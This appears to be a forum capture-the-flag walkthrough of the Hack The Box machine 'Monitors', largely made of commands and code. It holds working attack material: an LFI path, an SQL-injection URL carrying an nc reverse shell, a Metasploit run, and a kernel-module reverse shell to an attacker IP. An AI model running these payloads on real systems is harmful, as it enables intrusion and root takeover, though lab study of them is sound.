TUTORIAL Monitors - WriteUp
by Gh0sTs - April 27, 2021 at 07:13 PM
#1
Monitors Walkthrough

## NMAP ##

└─# nmap -sVC -T4 -Pn -n -p- monitors.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 15:07 EEST
Nmap scan report for monitors.htb (10.129.120.70)
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT  STATE SERVICE VERSION
22/tcp open  ssh    OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|  2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|  256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.5.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to Monitor – Taking hardware monitoring seriously
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.63 seconds



The CMS of the website is Wordpress. Using WPScan it's noticed it's vuln to file inclusion.


| [!] 1 vulnerability identified:
|
| [!] Title: WP with Spritz 1.0 - Unauthenticated File Inclusion
|    References:
|      - https://wpscan.com/vulnerability/cdd8b32a-b424-4548-a801-bbacbaad23f8
|      - https://www.exploit-db.com/exploits/44544/



Validating the LFI and we can read /etc/passwd file.
http://monitors.htb//wp-content/plugins/...etc/passwd


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
\_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false



A subdomain is found: cacti-admin.monitors.htb which requires authentication.
Use the admin account of the WP and the pass from wp-config.php file.


curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php" | grep -i pass
  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current
                                Dload  Upload  Total  Spent    Left  Speed
100  3117  100  3117    0    0  36244      0 --:--:-- --:--:-- --:--:-- 36244
/** MySQL database password */
define( 'DB_PASSWORD', '[email protected]!' );



Cacti has an SQLi vuln (https://www.mageni.net/vulnerability/cac...ows-113708).
Create a NC listener and epxloit the vulnerability:

1. http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.x+5555+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-

2. http://cacti-admin.monitors.htb/cacti/host.php?action=reindex&host_id=1


Get the rev shell.

## User ##
Checking the content of the file located at `/home/marcus/.backup/backup.sh` uncovers a password:
VerticalEdge2020
.
SSH Into the machine as marcus.


## Priv Esc - Container
From the note.txt we find out there is a docker running.
Using netstat a local instance of Tomcat is found.



[email protected]:~$ netstat -anotp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address          Foreign Address        State      PID/Program name    Timer
tcp        0      0 127.0.0.1:3306          0.0.0.0:*              LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.53:53          0.0.0.0:*              LISTEN      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*              LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:8443          0.0.0.0:*              LISTEN      -                    off (0.00/0/0)



Forward the port of the new found service and check it out.
ssh -L 8443:127.0.0.1:8443 [email protected]

By trying to access it it seems to be an Apache Tomcat 9.0.31.
Found this post saying our Apache instance might be vulnerable: https://www.zerodayinitiative.com/blog/2...usted-data
Found a metasploit module for it. Realized that setting forceexploit to true is required.


msfconsole -q 
use exploit/linux/http/apache_ofbiz_deserialization 
set rhosts 127.0.0.1 
set lhost 10.10.14.40 
set forceexploit true 
run



You should now have a meterpreter shell and should be root (in the docker/container).


meterpreter > getuid

Server username: root @ 91a348a40438 (uid=0, gid=0, euid=0, egid=0)



## Container Escape ##

Check docker capabilities.



meterpreter > shell
capsh --print
Process 160 created.
Channel 1 created.
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=


Since the container has cap_sys_module capability we can insert/remove kernel modules.
The following code invokes a rev shell using usermode helper API.
For more info you can check: https://blog.pentesteracademy.com/abusin...5c29956edd


include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.71/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
        printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);



Create a file named Makefile with the following content:


obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean



Transfer the 2 created files to the target machines and compile them there.


cd /root
wget 10.10.14.40/reverse-shell.c
wget 10.10.14.40/Makefile



Use the make command to compile the file.
NOTE: Be careful to leave the makefile name Makefile. It's case sensitive. Either that or edit it in the Makefile file :).


make
make -C /lib/modules/4.15.0-142-generic/build M=/root modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /root/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/reverse-shell.mod.o
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
  LD [M]  /root/reverse-shell.ko


Create a NC listener and use the command insmod reverse-shell.ko to load the kernel module and get the rev shell.


─# nc -nlvp 4444       
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.120.228] 43580
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# whoami
whoami
root
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Monitors: root part for free siracuso 26 3,568 May 01, 2021 at 08:56 AM
Last Post: hhy
TUTORIAL Monitors HTB Detailed Writeup 0xmahesh 0 856 April 29, 2021 at 03:27 PM
Last Post: 0xmahesh
TUTORIAL Monitors Detailed Writeup Jockerjock 1 832 April 29, 2021 at 03:23 PM
Last Post: 0xmahesh

 Users browsing this thread: 1 Guest(s)